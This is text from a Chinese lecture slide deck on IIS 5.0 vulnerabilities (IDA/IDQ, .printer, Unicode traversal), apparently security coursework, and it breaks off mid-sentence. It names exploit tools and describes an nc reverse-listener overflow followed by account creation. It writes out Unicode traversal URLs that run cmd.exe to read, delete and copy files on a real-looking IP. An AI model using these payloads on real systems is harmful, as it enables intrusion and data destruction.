05_基于漏洞的入侵及其防范之二.ppt

IIS中的漏洞利用与防范 IIS中的漏洞 IIS5.0是Windows 2000中附带的Web服务器，功能很强大，但是漏洞也比较多。据说，现在已经发现了IIS5.0的一千多个漏洞。也许更多的还没有被发现。 Windows 2000中的Internet 信息服务 IIS常见漏洞 .IDA.IDQ漏洞 Printer漏洞 Unicode漏洞 .asp映射分块编码漏洞 Webdav漏洞 漏洞的原因：ida和idq是iis中用来提供索引服务的一种文件。如果在Web服务器中存在这种文件，那么客户可以从浏览器中请求这种文件进行数据查询。Iis会把客户的请求转给一个名为idq.dll的动态连接库进行处理 Idq.dll文件中存在一个缓冲区溢出漏洞。当超过指定长度的请求被传进来的时候，服务器会出错。如果该请求被黑客精心构造（这种请求数据称为shellcode），服务器会执行请求数据中的程序代码。成功利用该漏洞，可以以管理员的身份运行Shellcode，进行可能完全控制该服务器。 一个idaidq漏洞的攻击工具 IDAIDQ漏洞检测与利用 漏洞检测: 手工检测：在地址栏中输入“Http://[IP]/*.ida(或idq)，如果返回“找不到IDQ文件……”，就说明该IIS服务器存在该漏洞； 工具检测：X-SCAN和SFIND（命令行方式） 漏洞利用： IDA入侵： 使用工具：IDAHACK（参看教材P133）。 入侵思路：扫描—IDA溢出—Telnet登录—建立账号 IDQ入侵： 工具：IISIDQ 入侵过程参看教材P135——138。 .printer漏洞 影响windows2000 server系统。IIS存在打印扩展ISAPI（Internet Services Application Programming Interface），该扩展可以通过WEB调用打印机。该漏洞只需要打开80端口或443端口，一般情况下的攻击会使WEB服务器停止响应。 漏洞检测：可用X-SCAN扫描 .printer漏洞的利用 使用工具：IIS5.Printer Exploit进行漏洞利用 入侵过程： 在本地用NC打开一个监听端口：nc –l –p 250 用“IIS5Exploit [目标IP] [本地IP] 250” 命令对远程主机进行漏洞溢出 在获得远程主机的命令窗口后，可建立账号 Unicode目录遍历漏洞(教材P143) Unicode 目录遍历也是IIS上一个著名的漏洞 Nimda(尼姆达)病毒利用了该病毒进行传播 SP2和之前的版本中存在 借助于该漏洞，可以访问与Web根目录在同一个驱动器上的文件。如果该驱动器是安装系统的驱动器，则可以访问cmd.exe，并可以以 IUSR_machinename (这里的machinename是机器名，该帐号在安装IIS的时候自动建立)的身份运行命令 利用该漏洞，一般不能直接获取服务器的管理员权限，但是一般可以修改Web服务器上的网页内容，获得网站的控制权。 配合Windows和IIS的其他漏洞，一般可以得到系统管理员的权限 利用该漏洞，可以在IE中执行远程命令 漏洞的探查 可以使用XScan进行扫描，也可以手工测试 在Windows中，..表示上层目录，所以在命令中可以使用 ..\..表示上层的上层。但在iis中如果直接输入 ..\..将被过滤掉。但是编程人员犯了一个错误，可以使用 unicode字符（如%c1%1c）表示”/”，而这样并不会被过滤，因而可以正常访问。 利用Unicode漏洞操作目标主机文件 1.显示文件内容 如果想显示目标主机里面的一个名为lucky.txt文本文件，输人下面这行命令即可(要显示htm, asp, bat等文件都用同样的方法): http://216.246.X.X/scripts/..%c1%1c../winnt/ system32/cmd.exe?/c+type+c:\lucky.txt 这样该文件的内容就可以通过IE显示出来。 2.删除文件 输入如下命令，即可删除主机上lucky.txt文件: http://216.246.X.X/scripts/..%c1%1c../winnt/ system32/cmd.exe?/c+del+c:\lucky.tx 3.copy文件的同时将该文件改名 输入如下命令，即可将主机上的lucky.txt改名为luck.txt： http://216.246.X.X/scripts/..%c1%1c../winnt/ system32/cmd.exe?/c+copy+c:\lucky.txt luck.txt 4.COPY文件到另外的文件夹 输入如下命令，就可以主机上的c:\lucky文